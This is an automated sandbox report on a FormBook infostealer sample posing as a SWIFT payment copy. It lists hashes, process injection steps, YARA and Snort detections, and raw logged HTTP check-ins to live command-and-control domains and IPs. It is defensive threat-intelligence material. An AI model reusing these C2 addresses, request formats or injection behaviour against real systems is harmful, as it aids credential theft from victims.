Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment_Copy_[SWIFT_COPY].exe

Overview

General Information

Sample name:Payment_Copy_[SWIFT_COPY].exe
Analysis ID:1355380
MD5:1827b46843b0cf4502a0c0395914842d
SHA1:4af6143d665e11ef138534c1f803ec7531a07d4d
SHA256:50a40c6d5d6f716a1af1ff170aa99c4c0a21271995d5d14817f9955aabd6aa67
Tags:exe
Infos:

Detection

FormBook, NSISDropper
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected NSISDropper
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Payment_Copy_[SWIFT_COPY].exe (PID: 7464 cmdline: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe MD5: 1827B46843B0CF4502A0C0395914842D)
    • btpqr.exe (PID: 7532 cmdline: "C:\Users\user\AppData\Local\Temp\btpqr.exe" MD5: 51D987CA1642C555FB00D10AA35F8348)
      • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • btpqr.exe (PID: 7592 cmdline: C:\Users\user\AppData\Local\Temp\btpqr.exe MD5: 51D987CA1642C555FB00D10AA35F8348)
        • mNtjNwEeCHVoSqPJEzBvhXy.exe (PID: 6988 cmdline: "C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • typeperf.exe (PID: 7680 cmdline: C:\Windows\SysWOW64\typeperf.exe MD5: 93925D4F55465CFC73C4CDF7F8B1F375)
            • mNtjNwEeCHVoSqPJEzBvhXy.exe (PID: 6992 cmdline: "C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 8032 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x31244:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1d493:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x574b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x436ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.3839355049.0000000000BC0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.btpqr.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.btpqr.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2a033:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16282:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          4.2.btpqr.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            4.2.btpqr.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ae33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17082:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.2.8144.217.103.349756802855465 12/07/23-13:45:53.892265
            SID:2855465
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.869.57.161.21549720802855465 12/07/23-13:43:25.108484
            SID:2855465
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.864.190.62.2249732802855465 12/07/23-13:44:20.591294
            SID:2855465
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.8173.231.241.13249716802855465 12/07/23-13:43:07.624786
            SID:2855465
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.8208.91.197.2749752802855465 12/07/23-13:45:31.302057
            SID:2855465
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.8162.240.81.1849740802855465 12/07/23-13:44:49.247971
            SID:2855465
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.884.32.84.3249707802855465 12/07/23-13:42:23.852123
            SID:2855465
            Source Port:49707
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.8217.144.107.249728802855465 12/07/23-13:44:05.771412
            SID:2855465
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.884.32.84.3249748802855465 12/07/23-13:45:17.103098
            SID:2855465
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.868.178.195.7149744802855465 12/07/23-13:45:02.926842
            SID:2855465
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.8194.58.112.17449724802855465 12/07/23-13:43:39.597890
            SID:2855465
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.8207.244.126.15049736802855465 12/07/23-13:44:35.378384
            SID:2855465
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.8103.210.56.14149711802855465 12/07/23-13:42:53.053398
            SID:2855465
            Source Port:49711
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://porousworld.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=xSDcG6jAvira URL Cloud: Label: malware
            Source: http://www.cjjmobbbshhhu.shop/m858/?nRRpS=VXEesAUKk48GI7/v/F/vk/2J7KfCFYqlfqdzSz80FcScnenugkkRQu/gNtJifjh8nwe2JaaLs5Szx6+RWLiYtzUoBAQbExEboA==&w6i=ADXH7n8hwvbLKF6Avira URL Cloud: Label: malware
            Source: http://www.cjjmobbbshhhu.shop/m858/Avira URL Cloud: Label: malware
            Source: http://www.sorenad.com/m858/Avira URL Cloud: Label: malware
            Source: http://www.lets-room.online/m858/Avira URL Cloud: Label: malware
            Source: http://www.speedbikesglobal.com/m858/Avira URL Cloud: Label: malware
            Source: http://www.porousworld.com/m858/Avira URL Cloud: Label: malware
            Source: https://rytrk.com/track.Avira URL Cloud: Label: malware
            Source: http://www.belaflorloja.online/m858/Avira URL Cloud: Label: malware
            Source: http://www.ozzventures.shop/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=E3d5DyrEcfJbX1PJB/KGYac5KRSYq3LrneiR+hvnGmPole79cfvMffiwEvZVyE+NwNCm4kMx2S50UNzNVB069nu2XDEJbhHAtQ==Avira URL Cloud: Label: malware
            Source: http://sorenad.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmDAvira URL Cloud: Label: malware
            Source: https://rytrk.comAvira URL Cloud: Label: malware
            Source: http://www.fortunetravelsltd.com/m858/?nRRpS=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw9bsMzi4V9YgtsvXh5Nq9d6FGv9KJFWM1d64+w==&w6i=ADXH7n8hwvbLKF6Avira URL Cloud: Label: malware
            Source: http://fortunetravelsltd.com/m858/?nRRpS=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxAvira URL Cloud: Label: malware
            Source: http://www.fortunetravelsltd.com/m858/Avira URL Cloud: Label: malware
            Source: http://www.medical-loan24.live/m858/Avira URL Cloud: Label: malware
            Source: http://www.greenharbor.info/m858/Avira URL Cloud: Label: malware
            Source: http://www.sorenad.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJjJTNUnrI50PFHD/luRytaX7y+uiX625dNPSr5MT6J+IM8w==Avira URL Cloud: Label: malware
            Source: http://www.greenharbor.info/m858/?nRRpS=l3PhQIcXSIPbTWu7p/uiREsJUVtNOEFcSOOLMhvnuN6H7BalBQjl+86I6Nr3Qdue789gEwulMvGUQuhGePzt1TzPXk8Fubw2qA==&w6i=ADXH7n8hwvbLKF6Avira URL Cloud: Label: malware
            Source: http://www.belaflorloja.online/m858/?nRRpS=7ouShKyUNVA5Yjh6oktqXavps0HIih1xZvCLkyS5t8G4GMV8fEbeekSmji8tZe+tjjZfsA6F4HW6RYQ7SobZsKbvkZ0uY+Z5mQ==&w6i=ADXH7n8hwvbLKF6Avira URL Cloud: Label: malware
            Source: http://www.speedbikesglobal.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=89rK36yXGQSz/ZuNhGBEnsWtjb41/X7NemxUOJ39n9Wf5fwkS2xU1yd0FUAiE8JtPib6/UyBojBD74+XNjIiyM5CO9qwuDsBag==Avira URL Cloud: Label: malware
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeReversingLabs: Detection: 24%
            Multi AV Scanner detection for submitted file
            Source: Payment_Copy_[SWIFT_COPY].exeReversingLabs: Detection: 29%
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.btpqr.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.btpqr.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3839355049.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3839288746.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1526993010.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1527458942.0000000003670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: Payment_Copy_[SWIFT_COPY].exeJoe Sandbox ML: detected
            Source: Payment_Copy_[SWIFT_COPY].exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Binary string: firefox.pdbP source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1766828555.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000000.1446184640.000000000078E000.00000002.00000001.01000000.00000005.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000000.1580578250.000000000078E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: typeperf.pdb source: btpqr.exe, 00000004.00000002.1526842326.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000002.3838573363.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: btpqr.exe, 00000002.00000003.1372381572.000000001D0B0000.00000004.00001000.00020000.00000000.sdmp, btpqr.exe, 00000002.00000003.1373122144.000000001D250000.00000004.00001000.00020000.00000000.sdmp, btpqr.exe, 00000004.00000002.1527020260.0000000000CBE000.00000040.00001000.00020000.00000000.sdmp, btpqr.exe, 00000004.00000003.1444358951.000000000097A000.00000004.00000020.00020000.00000000.sdmp, btpqr.exe, 00000004.00000003.1442583872.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, btpqr.exe, 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1526329092.0000000000B87000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1528531756.0000000002E15000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: btpqr.exe, btpqr.exe, 00000004.00000002.1527020260.0000000000CBE000.00000040.00001000.00020000.00000000.sdmp, btpqr.exe, 00000004.00000003.1444358951.000000000097A000.00000004.00000020.00020000.00000000.sdmp, btpqr.exe, 00000004.00000003.1442583872.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, btpqr.exe, 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, typeperf.exe, 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1526329092.0000000000B87000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1528531756.0000000002E15000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: typeperf.pdbGCTL source: btpqr.exe, 00000004.00000002.1526842326.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000002.3838573363.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1766828555.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_00405EC2 FindFirstFileA,FindClose,0_2_00405EC2
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054EC
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_006FC010 FindFirstFileW,FindNextFileW,FindClose,6_2_006FC010
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 4x nop then pop edi6_2_006F1810
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 4x nop then xor eax, eax6_2_006E99A0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 4x nop then pop edi6_2_006EE0C7

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49707 -> 84.32.84.32:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49711 -> 103.210.56.141:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49716 -> 173.231.241.132:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49720 -> 69.57.161.215:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49724 -> 194.58.112.174:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49728 -> 217.144.107.2:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49732 -> 64.190.62.22:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49736 -> 207.244.126.150:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49740 -> 162.240.81.18:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49744 -> 68.178.195.71:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49748 -> 84.32.84.32:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49752 -> 208.91.197.27:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49756 -> 144.217.103.3:80
            Source: Joe Sandbox ViewIP Address: 162.240.81.18 162.240.81.18
            Source: Joe Sandbox ViewIP Address: 207.244.126.150 207.244.126.150
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
            Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-WDCUS LEASEWEB-USA-WDCUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=E3d5DyrEcfJbX1PJB/KGYac5KRSYq3LrneiR+hvnGmPole79cfvMffiwEvZVyE+NwNCm4kMx2S50UNzNVB069nu2XDEJbhHAtQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.ozzventures.shopConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?nRRpS=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw9bsMzi4V9YgtsvXh5Nq9d6FGv9KJFWM1d64+w==&w6i=ADXH7n8hwvbLKF6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.fortunetravelsltd.comConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=xSDcG6j+Ey2rPqhzwDdzjJVnVNgkT4rk7B/VgGxpF9KJHhiy72u20ZI8z6z+NNUSjVU02PDtrOX7gmvolmuvKlLpV/QRDbvCOg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.porousworld.comConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?nRRpS=l3PhQIcXSIPbTWu7p/uiREsJUVtNOEFcSOOLMhvnuN6H7BalBQjl+86I6Nr3Qdue789gEwulMvGUQuhGePzt1TzPXk8Fubw2qA==&w6i=ADXH7n8hwvbLKF6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.greenharbor.infoConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=OT9XPYCRU0j98Hg/1uDBlXaBM2XXKmT/I6iFF8QONKz/+dd2eTQvqRBLoPpbyNuYQnsLqtRbnM1ZEfE8nLSuVudurqNICOu10w== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.lets-room.onlineConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJjJTNUnrI50PFHD/luRytaX7y+uiX625dNPSr5MT6J+IM8w== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.sorenad.comConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?nRRpS=IsVLP75BXPV29irb7QUBT0f93P2nzsiWNaG7Z6nH6v/C9T4Z/rVV4+geNHA05yDya3IUff47iHu4NOYvgxXZw665HDhGdi01yA==&w6i=ADXH7n8hwvbLKF6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.medical-loan24.liveConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=89rK36yXGQSz/ZuNhGBEnsWtjb41/X7NemxUOJ39n9Wf5fwkS2xU1yd0FUAiE8JtPib6/UyBojBD74+XNjIiyM5CO9qwuDsBag== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.speedbikesglobal.comConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?nRRpS=7ouShKyUNVA5Yjh6oktqXavps0HIih1xZvCLkyS5t8G4GMV8fEbeekSmji8tZe+tjjZfsA6F4HW6RYQ7SobZsKbvkZ0uY+Z5mQ==&w6i=ADXH7n8hwvbLKF6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.belaflorloja.onlineConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBp3QsCSEIlQr7ZxZGtQx938wNB79Up+t5frQyoMoLXF0pXDVrMpxqlwTFbA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.blessingstation.orgConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?nRRpS=VXEesAUKk48GI7/v/F/vk/2J7KfCFYqlfqdzSz80FcScnenugkkRQu/gNtJifjh8nwe2JaaLs5Szx6+RWLiYtzUoBAQbExEboA==&w6i=ADXH7n8hwvbLKF6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.cjjmobbbshhhu.shopConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
